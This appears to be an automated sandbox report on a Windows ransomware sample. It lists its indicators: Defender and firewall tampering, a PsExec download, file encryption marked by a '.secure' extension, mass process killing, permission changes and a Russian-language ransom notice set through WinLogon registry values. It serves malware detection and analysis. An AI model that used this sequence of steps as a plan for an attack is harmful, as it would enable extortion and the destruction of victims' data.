936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd

Resubmissions

29-10-2021 14:51

211029-r8nn1aacaj 10

23-03-2021 18:12

210323-s8jdk5y98j 10

Analysis

max time kernel
300s
max time network
306s
platform
windows7_x64
resource
win7-en-20210920
submitted
29-10-2021 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Size

296KB
MD5

6b2c7d5298c7fb8f4c4c3531894a91c1
SHA1

d7333af03603b27566ac8ab63d6aa21575e1ebb4
SHA256

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd
SHA512

2555a572e9088ce58dce5bcaf1c0fca76727b6a1e1315ec0dbfe588a796faf1d083cb6ff3a6362f7c8075a4f321228c6227db7a3207fa557fff68e9fd4a3e114

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 14 http://live.sysinternals.com/PsExec64.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	14	http://live.sysinternals.com/PsExec64.exe

Modifies extensions of user files 14 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ProtectSelect.tiff => C:\Users\Admin\Pictures\ProtectSelect.tiff.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Users\Admin\Pictures\RevokeOut.tiff	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\SkipDebug.png => C:\Users\Admin\Pictures\SkipDebug.png.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\OutSend.crw => C:\Users\Admin\Pictures\OutSend.crw.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\GetApprove.tiff => C:\Users\Admin\Pictures\GetApprove.tiff.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\RevokeOut.tiff => C:\Users\Admin\Pictures\RevokeOut.tiff.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\SendCheckpoint.raw => C:\Users\Admin\Pictures\SendCheckpoint.raw.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\ShowOpen.raw => C:\Users\Admin\Pictures\ShowOpen.raw.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\DisableCompare.tif => C:\Users\Admin\Pictures\DisableCompare.tif.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\SubmitReceive.raw => C:\Users\Admin\Pictures\SubmitReceive.raw.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Users\Admin\Pictures\ProtectSelect.tiff	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\PingImport.tif => C:\Users\Admin\Pictures\PingImport.tif.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File renamed	C:\Users\Admin\Pictures\StopSync.crw => C:\Users\Admin\Pictures\StopSync.crw.secure	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Users\Admin\Pictures\GetApprove.tiff	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
7620
8056
7108
2324
7352
4528
2444
2956
7120
4988	icacls.exe
5304
1044
3464
4596	icacls.exe
2472
4932
3560
4712	icacls.exe
7544	icacls.exe
7676
2628
3920
8116
3616	icacls.exe
2284
7160
7016	icacls.exe
5276
1732
6868
4928	icacls.exe
2980	icacls.exe
5012
6528
5728
3084	icacls.exe
5476	icacls.exe
3128
7580	icacls.exe
7528	icacls.exe
7348
6628
6992
5508	icacls.exe
5796
2280
5584
2864
6908
6456	icacls.exe
3196
3612
6268
4056
5684
4196
3212	icacls.exe
3600	icacls.exe
3028
4252
8132
5132
5836	icacls.exe
5604	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "У вас сложности с IT безопасностью?\r\n\r\nНаши специалисты Вам гарантировано помогут.\r\n\r\nДля этого напишите нам на почту - [email protected]"	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Drops file in Program Files directory 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BS53BOXS.POC	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LTHD98.POC	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Country.css	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.SemiTrust.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\RSSFeeds.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\settings.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Media Player\de-DE\WMPMediaSharing.dll.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\PS2SWOOS.POC	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\SessionMember.ico	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\DataSet.zip	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Address.accft	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POST98SP.POC	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\settings.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Verve.thmx	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_dot.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\js\cpu.js	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Technic.eftx	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\weather.js	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\settings.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\gadget.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\gadget.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LOGO98.POC	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBlankPage.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\localizedStrings.js	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_divider_left.png	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssci.dll.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\ODBCR.SAM	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\init.js	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsColorChart.html	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

1524 net.exe

pid	process
1524	net.exe

Kills process with taskkill 57 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4540	taskkill.exe
4500	taskkill.exe
4308	taskkill.exe
4476	taskkill.exe
4596	taskkill.exe
4700	taskkill.exe
4572	taskkill.exe
4684	taskkill.exe
4276	taskkill.exe
4396	taskkill.exe
4436	taskkill.exe
4644	taskkill.exe
4372	taskkill.exe
4468	taskkill.exe
4532	taskkill.exe
4588	taskkill.exe
4580	taskkill.exe
4260	taskkill.exe
4324	taskkill.exe
4556	taskkill.exe
4452	taskkill.exe
4524	taskkill.exe
4508	taskkill.exe
4668	taskkill.exe
4268	taskkill.exe
4516	taskkill.exe
4708	taskkill.exe
4284	taskkill.exe
4612	taskkill.exe
4652	taskkill.exe
4404	taskkill.exe
4724	taskkill.exe
4604	taskkill.exe
4732	taskkill.exe
4356	taskkill.exe
4364	taskkill.exe
4444	taskkill.exe
4460	taskkill.exe
4548	taskkill.exe
4676	taskkill.exe
4660	taskkill.exe
4300	taskkill.exe
4348	taskkill.exe
4412	taskkill.exe
4636	taskkill.exe
4692	taskkill.exe
4292	taskkill.exe
4380	taskkill.exe
4388	taskkill.exe
4484	taskkill.exe
4628	taskkill.exe
1804	taskkill.exe
4332	taskkill.exe
4564	taskkill.exe
4316	taskkill.exe
4340	taskkill.exe
4492	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1300 reg.exe
Runs net.exe

pid	process
1300	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

pid	process
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1820	936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe
Token: SeDebugPrivilege	1804	taskkill.exe
Token: SeDebugPrivilege	4404	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	4356	taskkill.exe
Token: SeDebugPrivilege	4412	taskkill.exe
